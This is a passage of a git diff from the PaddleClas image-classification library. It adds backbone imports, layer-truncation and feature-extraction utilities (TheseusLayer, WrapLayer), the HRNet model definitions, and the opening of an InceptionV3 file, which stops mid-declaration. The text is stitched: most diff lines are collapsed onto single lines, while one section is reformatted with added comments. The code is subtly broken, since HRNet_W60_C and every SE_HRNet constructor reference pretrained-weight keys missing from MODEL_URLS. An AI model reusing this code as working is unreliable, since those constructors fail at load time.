ResNeXt101_32x48d_wsl +from ppcls.arch.backbone.model_zoo.squeezenet import SqueezeNet1_0, SqueezeNet1_1 +from ppcls.arch.backbone.model_zoo.darknet import DarkNet53 +from ppcls.arch.backbone.model_zoo.regnet import RegNetX_200MF, RegNetX_4GF, RegNetX_32GF, RegNetY_200MF, RegNetY_4GF, RegNetY_32GF +from ppcls.arch.backbone.model_zoo.vision_transformer import ViT_small_patch16_224, ViT_base_patch16_224, ViT_base_patch16_384, ViT_base_patch32_384, ViT_large_patch16_224, ViT_large_patch16_384, ViT_large_patch32_384, ViT_huge_patch16_224, ViT_huge_patch32_384 +from ppcls.arch.backbone.model_zoo.distilled_vision_transformer import DeiT_tiny_patch16_224, DeiT_small_patch16_224, DeiT_base_patch16_224, DeiT_tiny_distilled_patch16_224, DeiT_small_distilled_patch16_224, DeiT_base_distilled_patch16_224, DeiT_base_patch16_384, DeiT_base_distilled_patch16_384 +from ppcls.arch.backbone.model_zoo.swin_transformer import SwinTransformer_tiny_patch4_window7_224, SwinTransformer_small_patch4_window7_224, SwinTransformer_base_patch4_window7_224, SwinTransformer_base_patch4_window12_384, SwinTransformer_large_patch4_window7_224, SwinTransformer_large_patch4_window12_384 +from ppcls.arch.backbone.model_zoo.mixnet import MixNet_S, MixNet_M, MixNet_L +from ppcls.arch.backbone.model_zoo.rexnet import ReXNet_1_0, ReXNet_1_3, ReXNet_1_5, ReXNet_2_0, ReXNet_3_0 +from ppcls.arch.backbone.model_zoo.gvt import pcpvt_small, pcpvt_base, pcpvt_large, alt_gvt_small, alt_gvt_base, alt_gvt_large +from ppcls.arch.backbone.model_zoo.levit import LeViT_128S, LeViT_128, LeViT_192, LeViT_256, LeViT_384 +from ppcls.arch.backbone.model_zoo.dla import DLA34, DLA46_c, DLA46x_c, DLA60, DLA60x, DLA60x_c, DLA102, DLA102x, DLA102x2, DLA169 +from ppcls.arch.backbone.model_zoo.rednet import RedNet26, RedNet38, RedNet50, RedNet101, RedNet152 +from ppcls.arch.backbone.model_zoo.tnt import TNT_small +from ppcls.arch.backbone.model_zoo.hardnet import HarDNet68, HarDNet85, HarDNet39_ds, HarDNet68_ds +from 
from ppcls.arch.backbone.variant_models.vgg_variant import VGG19Sigmoid


def get_apis():
    """Collect the names of all classes and functions visible in this module
    (i.e. every backbone entry point imported above), excluding this helper.
    """
    # Name of the currently executing function ("get_apis"), so it can be
    # removed from the collected list below.
    current_func = sys._getframe().f_code.co_name
    current_module = sys.modules[__name__]
    api = []
    # getmembers yields (name, object) pairs; classes first, then functions.
    for _, obj in inspect.getmembers(current_module,
                                     inspect.isclass) + inspect.getmembers(
                                         current_module, inspect.isfunction):
        api.append(obj.__name__)
    api.remove(current_func)
    return api


# The public API is everything imported into this module at this point.
__all__ = get_apis()


from abc import ABC
from paddle import nn
import re


class Identity(nn.Layer):
    """No-op layer: returns its input unchanged (used to truncate networks)."""

    def __init__(self):
        super(Identity, self).__init__()

    def forward(self, inputs):
        return inputs


class TheseusLayer(nn.Layer):
    """Base layer with graph-surgery utilities (stop_after / update_res /
    replace_sub) used by the PaddleClas legendary models.
    """

    def __init__(self, *args, **kwargs):
        super(TheseusLayer, self).__init__()
        # Shared store for intermediate outputs collected by forward hooks.
        self.res_dict = {}

    # stop doesn't work when stop layer has a parallel branch.
    def stop_after(self, stop_layer_name: str):
        """Truncate the network after the named sub-layer.

        Every sub-layer registered after `stop_layer_name` (matched against
        Layer.full_name()) is replaced by Identity, so forward passes become
        no-ops past that point. Recurses into TheseusLayer children.

        Returns:
            bool: True once the stop layer has been found (here or in a child).
        """
        after_stop = False
        for layer_i in self._sub_layers:
            if after_stop:
                self._sub_layers[layer_i] = Identity()
                continue
            layer_name = self._sub_layers[layer_i].full_name()
            if layer_name == stop_layer_name:
                after_stop = True
                continue
            if isinstance(self._sub_layers[layer_i], TheseusLayer):
                after_stop = self._sub_layers[layer_i].stop_after(
                    stop_layer_name)
        return after_stop

    def update_res(self, return_patterns):
        """Register forward hooks so sub-layers whose full_name() matches any
        regex in `return_patterns` record their outputs into self.res_dict.

        nn.Sequential / nn.LayerList children are wrapped in WrapLayer first;
        matched non-TheseusLayer children are wrapped too so they can carry
        the shared res_dict. Recurses through the whole layer tree.
        """
        if not return_patterns or isinstance(self, WrapLayer):
            return
        for layer_i in self._sub_layers:
            layer_name = self._sub_layers[layer_i].full_name()
            if isinstance(self._sub_layers[layer_i], (nn.Sequential, nn.LayerList)):
                self._sub_layers[layer_i] = wrap_theseus(self._sub_layers[layer_i], self.res_dict)
                self._sub_layers[layer_i].update_res(return_patterns)
            else:
                for return_pattern in return_patterns:
                    if re.match(return_pattern, layer_name):
                        if not isinstance(self._sub_layers[layer_i], TheseusLayer):
                            self._sub_layers[layer_i] = wrap_theseus(self._sub_layers[layer_i], self.res_dict)
                        else:
                            self._sub_layers[layer_i].res_dict = self.res_dict

                        self._sub_layers[layer_i].register_forward_post_hook(
                            self._sub_layers[layer_i]._save_sub_res_hook)
                if isinstance(self._sub_layers[layer_i], TheseusLayer):
                    self._sub_layers[layer_i].res_dict = self.res_dict
                    self._sub_layers[layer_i].update_res(return_patterns)

    def _save_sub_res_hook(self, layer, input, output):
        # Forward-post hook: record this layer's output under its full name.
        self.res_dict[layer.full_name()] = output

    def _return_dict_hook(self, layer, input, output):
        # Forward-post hook for the root layer: return {"output": y, ...}
        # including all recorded intermediates, draining res_dict so stale
        # entries do not leak into the next forward pass.
        res_dict = {"output": output}
        for res_key in list(self.res_dict):
            res_dict[res_key] = self.res_dict.pop(res_key)
        return res_dict
class WrapLayer(TheseusLayer):
    """Transparent TheseusLayer wrapper around an arbitrary sub-layer.

    Lets plain containers (nn.Sequential / nn.LayerList) participate in the
    shared res_dict mechanism while preserving the wrapped layer's
    full_name(), so regex patterns keep matching.
    """

    def __init__(self, sub_layer, res_dict=None):
        super(WrapLayer, self).__init__()
        self.sub_layer = sub_layer
        # Remember the wrapped layer's name; full_name() is overridden below.
        self.name = sub_layer.full_name()
        if res_dict is not None:
            self.res_dict = res_dict

    def full_name(self):
        return self.name

    def forward(self, *inputs, **kwargs):
        # Pure pass-through to the wrapped layer.
        return self.sub_layer(*inputs, **kwargs)

    def update_res(self, return_patterns):
        """Hook matching descendants of the wrapped container into res_dict."""
        if not return_patterns or not isinstance(self.sub_layer, (nn.Sequential, nn.LayerList)):
            return
        for layer_i in self.sub_layer._sub_layers:
            if isinstance(self.sub_layer._sub_layers[layer_i], (nn.Sequential, nn.LayerList)):
                self.sub_layer._sub_layers[layer_i] = wrap_theseus(self.sub_layer._sub_layers[layer_i], self.res_dict)
                self.sub_layer._sub_layers[layer_i].update_res(return_patterns)
            elif isinstance(self.sub_layer._sub_layers[layer_i], TheseusLayer):
                self.sub_layer._sub_layers[layer_i].res_dict = self.res_dict

            layer_name = self.sub_layer._sub_layers[layer_i].full_name()
            for return_pattern in return_patterns:
                if re.match(return_pattern, layer_name):
                    # BUGFIX: take the hook from the *wrapped* child
                    # (self.sub_layer._sub_layers). The original indexed
                    # self._sub_layers[layer_i], but this wrapper's only
                    # sub-layer is registered under the key "sub_layer",
                    # so that lookup raised KeyError.
                    self.sub_layer._sub_layers[layer_i].register_forward_post_hook(
                        self.sub_layer._sub_layers[layer_i]._save_sub_res_hook)

            if isinstance(self.sub_layer._sub_layers[layer_i], TheseusLayer):
                self.sub_layer._sub_layers[layer_i].update_res(return_patterns)


def wrap_theseus(sub_layer, res_dict=None):
    """Wrap `sub_layer` in a WrapLayer sharing `res_dict`."""
    wrapped_layer = WrapLayer(sub_layer, res_dict)
    return wrapped_layer
+# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import math +import paddle +from paddle import nn +from paddle import ParamAttr +from paddle.nn.functional import upsample +from paddle.nn.initializer import Uniform + +from ppcls.arch.backbone.base.theseus_layer import TheseusLayer, Identity +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "HRNet_W18_C": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/HRNet_W18_C_pretrained.pdparams", + "HRNet_W30_C": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/HRNet_W30_C_pretrained.pdparams", + "HRNet_W32_C": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/HRNet_W32_C_pretrained.pdparams", + "HRNet_W40_C": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/HRNet_W40_C_pretrained.pdparams", + "HRNet_W44_C": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/HRNet_W44_C_pretrained.pdparams", + "HRNet_W48_C": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/HRNet_W48_C_pretrained.pdparams", + "HRNet_W64_C": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/HRNet_W64_C_pretrained.pdparams" +} + +__all__ = list(MODEL_URLS.keys()) + + +def _create_act(act): + if act == "hardswish": + return nn.Hardswish() + elif act == "relu": + return nn.ReLU() + elif act is None: + return Identity() + else: + raise 
RuntimeError( + "The activation function is not supported: {}".format(act)) + + +class ConvBNLayer(TheseusLayer): + def __init__(self, + num_channels, + num_filters, + filter_size, + stride=1, + groups=1, + act="relu"): + super().__init__() + + self.conv = nn.Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=(filter_size - 1) // 2, + groups=groups, + bias_attr=False) + self.bn = nn.BatchNorm(num_filters, act=None) + self.act = _create_act(act) + + def forward(self, x): + x = self.conv(x) + x = self.bn(x) + x = self.act(x) + return x + + +class BottleneckBlock(TheseusLayer): + def __init__(self, + num_channels, + num_filters, + has_se, + stride=1, + downsample=False): + super().__init__() + + self.has_se = has_se + self.downsample = downsample + + self.conv1 = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=1, + act="relu") + self.conv2 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters, + filter_size=3, + stride=stride, + act="relu") + self.conv3 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters * 4, + filter_size=1, + act=None) + + if self.downsample: + self.conv_down = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters * 4, + filter_size=1, + act=None) + + if self.has_se: + self.se = SELayer( + num_channels=num_filters * 4, + num_filters=num_filters * 4, + reduction_ratio=16) + self.relu = nn.ReLU() + + def forward(self, x, res_dict=None): + residual = x + x = self.conv1(x) + x = self.conv2(x) + x = self.conv3(x) + if self.downsample: + residual = self.conv_down(residual) + if self.has_se: + x = self.se(x) + x = paddle.add(x=residual, y=x) + x = self.relu(x) + return x + + +class BasicBlock(nn.Layer): + def __init__(self, num_channels, num_filters, has_se=False): + super().__init__() + + self.has_se = has_se + + self.conv1 = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=3, 
+ stride=1, + act="relu") + self.conv2 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters, + filter_size=3, + stride=1, + act=None) + + if self.has_se: + self.se = SELayer( + num_channels=num_filters, + num_filters=num_filters, + reduction_ratio=16) + self.relu = nn.ReLU() + + def forward(self, x): + residual = x + x = self.conv1(x) + x = self.conv2(x) + + if self.has_se: + x = self.se(x) + + x = paddle.add(x=residual, y=x) + x = self.relu(x) + return x + + +class SELayer(TheseusLayer): + def __init__(self, num_channels, num_filters, reduction_ratio): + super().__init__() + + self.avg_pool = nn.AdaptiveAvgPool2D(1) + + self._num_channels = num_channels + + med_ch = int(num_channels / reduction_ratio) + stdv = 1.0 / math.sqrt(num_channels * 1.0) + self.fc_squeeze = nn.Linear( + num_channels, + med_ch, + weight_attr=ParamAttr(initializer=Uniform(-stdv, stdv))) + self.relu = nn.ReLU() + stdv = 1.0 / math.sqrt(med_ch * 1.0) + self.fc_excitation = nn.Linear( + med_ch, + num_filters, + weight_attr=ParamAttr(initializer=Uniform(-stdv, stdv))) + self.sigmoid = nn.Sigmoid() + + def forward(self, x, res_dict=None): + residual = x + x = self.avg_pool(x) + x = paddle.squeeze(x, axis=[2, 3]) + x = self.fc_squeeze(x) + x = self.relu(x) + x = self.fc_excitation(x) + x = self.sigmoid(x) + x = paddle.unsqueeze(x, axis=[2, 3]) + x = residual * x + return x + + +class Stage(TheseusLayer): + def __init__(self, num_modules, num_filters, has_se=False): + super().__init__() + + self._num_modules = num_modules + + self.stage_func_list = nn.LayerList() + for i in range(num_modules): + self.stage_func_list.append( + HighResolutionModule( + num_filters=num_filters, has_se=has_se)) + + def forward(self, x, res_dict=None): + x = x + for idx in range(self._num_modules): + x = self.stage_func_list[idx](x) + return x + + +class HighResolutionModule(TheseusLayer): + def __init__(self, num_filters, has_se=False): + super().__init__() + + self.basic_block_list = nn.LayerList() + + 
for i in range(len(num_filters)): + self.basic_block_list.append( + nn.Sequential(*[ + BasicBlock( + num_channels=num_filters[i], + num_filters=num_filters[i], + has_se=has_se) for j in range(4) + ])) + + self.fuse_func = FuseLayers( + in_channels=num_filters, out_channels=num_filters) + + def forward(self, x, res_dict=None): + out = [] + for idx, xi in enumerate(x): + basic_block_list = self.basic_block_list[idx] + for basic_block_func in basic_block_list: + xi = basic_block_func(xi) + out.append(xi) + out = self.fuse_func(out) + return out + + +class FuseLayers(TheseusLayer): + def __init__(self, in_channels, out_channels): + super().__init__() + + self._actual_ch = len(in_channels) + self._in_channels = in_channels + + self.residual_func_list = nn.LayerList() + self.relu = nn.ReLU() + for i in range(len(in_channels)): + for j in range(len(in_channels)): + if j > i: + self.residual_func_list.append( + ConvBNLayer( + num_channels=in_channels[j], + num_filters=out_channels[i], + filter_size=1, + stride=1, + act=None)) + elif j < i: + pre_num_filters = in_channels[j] + for k in range(i - j): + if k == i - j - 1: + self.residual_func_list.append( + ConvBNLayer( + num_channels=pre_num_filters, + num_filters=out_channels[i], + filter_size=3, + stride=2, + act=None)) + pre_num_filters = out_channels[i] + else: + self.residual_func_list.append( + ConvBNLayer( + num_channels=pre_num_filters, + num_filters=out_channels[j], + filter_size=3, + stride=2, + act="relu")) + pre_num_filters = out_channels[j] + + def forward(self, x, res_dict=None): + out = [] + residual_func_idx = 0 + for i in range(len(self._in_channels)): + residual = x[i] + for j in range(len(self._in_channels)): + if j > i: + xj = self.residual_func_list[residual_func_idx](x[j]) + residual_func_idx += 1 + + xj = upsample(xj, scale_factor=2**(j - i), mode="nearest") + residual = paddle.add(x=residual, y=xj) + elif j < i: + xj = x[j] + for k in range(i - j): + xj = self.residual_func_list[residual_func_idx](xj) 
+ residual_func_idx += 1 + + residual = paddle.add(x=residual, y=xj) + + residual = self.relu(residual) + out.append(residual) + + return out + + +class LastClsOut(TheseusLayer): + def __init__(self, + num_channel_list, + has_se, + num_filters_list=[32, 64, 128, 256]): + super().__init__() + + self.func_list = nn.LayerList() + for idx in range(len(num_channel_list)): + self.func_list.append( + BottleneckBlock( + num_channels=num_channel_list[idx], + num_filters=num_filters_list[idx], + has_se=has_se, + downsample=True)) + + def forward(self, x, res_dict=None): + out = [] + for idx, xi in enumerate(x): + xi = self.func_list[idx](xi) + out.append(xi) + return out + + +class HRNet(TheseusLayer): + """ + HRNet + Args: + width: int=18. Base channel number of HRNet. + has_se: bool=False. If 'True', add se module to HRNet. + class_num: int=1000. Output num of last fc layer. + Returns: + model: nn.Layer. Specific HRNet model depends on args. + """ + + def __init__(self, width=18, has_se=False, class_num=1000, return_patterns=None): + super().__init__() + + self.width = width + self.has_se = has_se + self._class_num = class_num + + channels_2 = [self.width, self.width * 2] + channels_3 = [self.width, self.width * 2, self.width * 4] + channels_4 = [ + self.width, self.width * 2, self.width * 4, self.width * 8 + ] + + self.conv_layer1_1 = ConvBNLayer( + num_channels=3, + num_filters=64, + filter_size=3, + stride=2, + act="relu") + + self.conv_layer1_2 = ConvBNLayer( + num_channels=64, + num_filters=64, + filter_size=3, + stride=2, + act="relu") + + self.layer1 = nn.Sequential(*[ + BottleneckBlock( + num_channels=64 if i == 0 else 256, + num_filters=64, + has_se=has_se, + stride=1, + downsample=True if i == 0 else False) for i in range(4) + ]) + + self.conv_tr1_1 = ConvBNLayer( + num_channels=256, num_filters=width, filter_size=3) + self.conv_tr1_2 = ConvBNLayer( + num_channels=256, num_filters=width * 2, filter_size=3, stride=2) + + self.st2 = Stage( + num_modules=1, 
num_filters=channels_2, has_se=self.has_se) + + self.conv_tr2 = ConvBNLayer( + num_channels=width * 2, + num_filters=width * 4, + filter_size=3, + stride=2) + self.st3 = Stage( + num_modules=4, num_filters=channels_3, has_se=self.has_se) + + self.conv_tr3 = ConvBNLayer( + num_channels=width * 4, + num_filters=width * 8, + filter_size=3, + stride=2) + + self.st4 = Stage( + num_modules=3, num_filters=channels_4, has_se=self.has_se) + + # classification + num_filters_list = [32, 64, 128, 256] + self.last_cls = LastClsOut( + num_channel_list=channels_4, + has_se=self.has_se, + num_filters_list=num_filters_list) + + last_num_filters = [256, 512, 1024] + self.cls_head_conv_list = nn.LayerList() + for idx in range(3): + self.cls_head_conv_list.append( + ConvBNLayer( + num_channels=num_filters_list[idx] * 4, + num_filters=last_num_filters[idx], + filter_size=3, + stride=2)) + + self.conv_last = ConvBNLayer( + num_channels=1024, num_filters=2048, filter_size=1, stride=1) + + self.avg_pool = nn.AdaptiveAvgPool2D(1) + + stdv = 1.0 / math.sqrt(2048 * 1.0) + + self.fc = nn.Linear( + 2048, + class_num, + weight_attr=ParamAttr(initializer=Uniform(-stdv, stdv))) + if return_patterns is not None: + self.update_res(return_patterns) + self.register_forward_post_hook(self._return_dict_hook) + + def forward(self, x): + x = self.conv_layer1_1(x) + x = self.conv_layer1_2(x) + + x = self.layer1(x) + + tr1_1 = self.conv_tr1_1(x) + tr1_2 = self.conv_tr1_2(x) + x = self.st2([tr1_1, tr1_2]) + + tr2 = self.conv_tr2(x[-1]) + x.append(tr2) + x = self.st3(x) + + tr3 = self.conv_tr3(x[-1]) + x.append(tr3) + x = self.st4(x) + + x = self.last_cls(x) + + y = x[0] + for idx in range(3): + y = paddle.add(x[idx + 1], self.cls_head_conv_list[idx](y)) + + y = self.conv_last(y) + y = self.avg_pool(y) + y = paddle.reshape(y, shape=[-1, y.shape[1]]) + y = self.fc(y) + return y + + +def _load_pretrained(pretrained, model, model_url, use_ssld): + if pretrained is False: + pass + elif pretrained is True: + 
load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def HRNet_W18_C(pretrained=False, use_ssld=False, **kwargs): + """ + HRNet_W18_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `HRNet_W18_C` model depends on args. + """ + model = HRNet(width=18, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["HRNet_W18_C"], use_ssld) + return model + + +def HRNet_W30_C(pretrained=False, use_ssld=False, **kwargs): + """ + HRNet_W30_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `HRNet_W30_C` model depends on args. + """ + model = HRNet(width=30, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["HRNet_W30_C"], use_ssld) + return model + + +def HRNet_W32_C(pretrained=False, use_ssld=False, **kwargs): + """ + HRNet_W32_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `HRNet_W32_C` model depends on args. + """ + model = HRNet(width=32, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["HRNet_W32_C"], use_ssld) + return model + + +def HRNet_W40_C(pretrained=False, use_ssld=False, **kwargs): + """ + HRNet_W40_C + Args: + pretrained: bool=False or str. 
If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `HRNet_W40_C` model depends on args. + """ + model = HRNet(width=40, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["HRNet_W40_C"], use_ssld) + return model + + +def HRNet_W44_C(pretrained=False, use_ssld=False, **kwargs): + """ + HRNet_W44_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `HRNet_W44_C` model depends on args. + """ + model = HRNet(width=44, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["HRNet_W44_C"], use_ssld) + return model + + +def HRNet_W48_C(pretrained=False, use_ssld=False, **kwargs): + """ + HRNet_W48_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `HRNet_W48_C` model depends on args. + """ + model = HRNet(width=48, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["HRNet_W48_C"], use_ssld) + return model + + +def HRNet_W60_C(pretrained=False, use_ssld=False, **kwargs): + """ + HRNet_W60_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `HRNet_W60_C` model depends on args. 
+ """ + model = HRNet(width=60, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["HRNet_W60_C"], use_ssld) + return model + + +def HRNet_W64_C(pretrained=False, use_ssld=False, **kwargs): + """ + HRNet_W64_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `HRNet_W64_C` model depends on args. + """ + model = HRNet(width=64, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["HRNet_W64_C"], use_ssld) + return model + + +def SE_HRNet_W18_C(pretrained=False, use_ssld=False, **kwargs): + """ + SE_HRNet_W18_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `SE_HRNet_W18_C` model depends on args. + """ + model = HRNet(width=18, has_se=True, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["SE_HRNet_W18_C"], use_ssld) + return model + + +def SE_HRNet_W30_C(pretrained=False, use_ssld=False, **kwargs): + """ + SE_HRNet_W30_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `SE_HRNet_W30_C` model depends on args. + """ + model = HRNet(width=30, has_se=True, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["SE_HRNet_W30_C"], use_ssld) + return model + + +def SE_HRNet_W32_C(pretrained=False, use_ssld=False, **kwargs): + """ + SE_HRNet_W32_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. 
+ If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `SE_HRNet_W32_C` model depends on args. + """ + model = HRNet(width=32, has_se=True, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["SE_HRNet_W32_C"], use_ssld) + return model + + +def SE_HRNet_W40_C(pretrained=False, use_ssld=False, **kwargs): + """ + SE_HRNet_W40_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `SE_HRNet_W40_C` model depends on args. + """ + model = HRNet(width=40, has_se=True, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["SE_HRNet_W40_C"], use_ssld) + return model + + +def SE_HRNet_W44_C(pretrained=False, use_ssld=False, **kwargs): + """ + SE_HRNet_W44_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `SE_HRNet_W44_C` model depends on args. + """ + model = HRNet(width=44, has_se=True, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["SE_HRNet_W44_C"], use_ssld) + return model + + +def SE_HRNet_W48_C(pretrained=False, use_ssld=False, **kwargs): + """ + SE_HRNet_W48_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `SE_HRNet_W48_C` model depends on args. 
+ """ + model = HRNet(width=48, has_se=True, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["SE_HRNet_W48_C"], use_ssld) + return model + + +def SE_HRNet_W60_C(pretrained=False, use_ssld=False, **kwargs): + """ + SE_HRNet_W60_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `SE_HRNet_W60_C` model depends on args. + """ + model = HRNet(width=60, has_se=True, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["SE_HRNet_W60_C"], use_ssld) + return model + + +def SE_HRNet_W64_C(pretrained=False, use_ssld=False, **kwargs): + """ + SE_HRNet_W64_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `SE_HRNet_W64_C` model depends on args. + """ + model = HRNet(width=64, has_se=True, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["SE_HRNet_W64_C"], use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/inception_v3.py b/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/inception_v3.py new file mode 100644 index 0000000..50fbcb4 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/inception_v3.py @@ -0,0 +1,539 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. 
+# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import, division, print_function +import math +import paddle +from paddle import ParamAttr +import paddle.nn as nn +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform + +from ppcls.arch.backbone.base.theseus_layer import TheseusLayer +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "InceptionV3": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/InceptionV3_pretrained.pdparams" +} + +__all__ = MODEL_URLS.keys() +''' +InceptionV3 config: dict. + key: inception blocks of InceptionV3. + values: conv num in different blocks. 
+''' +NET_CONFIG = { + "inception_a": [[192, 256, 288], [32, 64, 64]], + "inception_b": [288], + "inception_c": [[768, 768, 768, 768], [128, 160, 160, 192]], + "inception_d": [768], + "inception_e": [1280, 2048] +} + + +class ConvBNLayer(TheseusLayer): + def __init__(self, + num_channels, + num_filters, + filter_size, + stride=1, + padding=0, + groups=1, + act="relu"): + super().__init__() + self.act = act + self.conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=padding, + groups=groups, + bias_attr=False) + self.bn = BatchNorm(num_filters) + self.relu = nn.ReLU() + + def forward(self, x): + x = self.conv(x) + x = self.bn(x) + if self.act: + x = self.relu(x) + return x + + +class InceptionStem(TheseusLayer): + def __init__(self): + super().__init__() + self.conv_1a_3x3 = ConvBNLayer( + num_channels=3, + num_filters=32, + filter_size=3, + stride=2, + act="relu") + self.conv_2a_3x3 = ConvBNLayer( + num_channels=32, + num_filters=32, + filter_size=3, + stride=1, + act="relu") + self.conv_2b_3x3 = ConvBNLayer( + num_channels=32, + num_filters=64, + filter_size=3, + padding=1, + act="relu") + + self.max_pool = MaxPool2D(kernel_size=3, stride=2, padding=0) + self.conv_3b_1x1 = ConvBNLayer( + num_channels=64, num_filters=80, filter_size=1, act="relu") + self.conv_4a_3x3 = ConvBNLayer( + num_channels=80, num_filters=192, filter_size=3, act="relu") + + def forward(self, x): + x = self.conv_1a_3x3(x) + x = self.conv_2a_3x3(x) + x = self.conv_2b_3x3(x) + x = self.max_pool(x) + x = self.conv_3b_1x1(x) + x = self.conv_4a_3x3(x) + x = self.max_pool(x) + return x + + +class 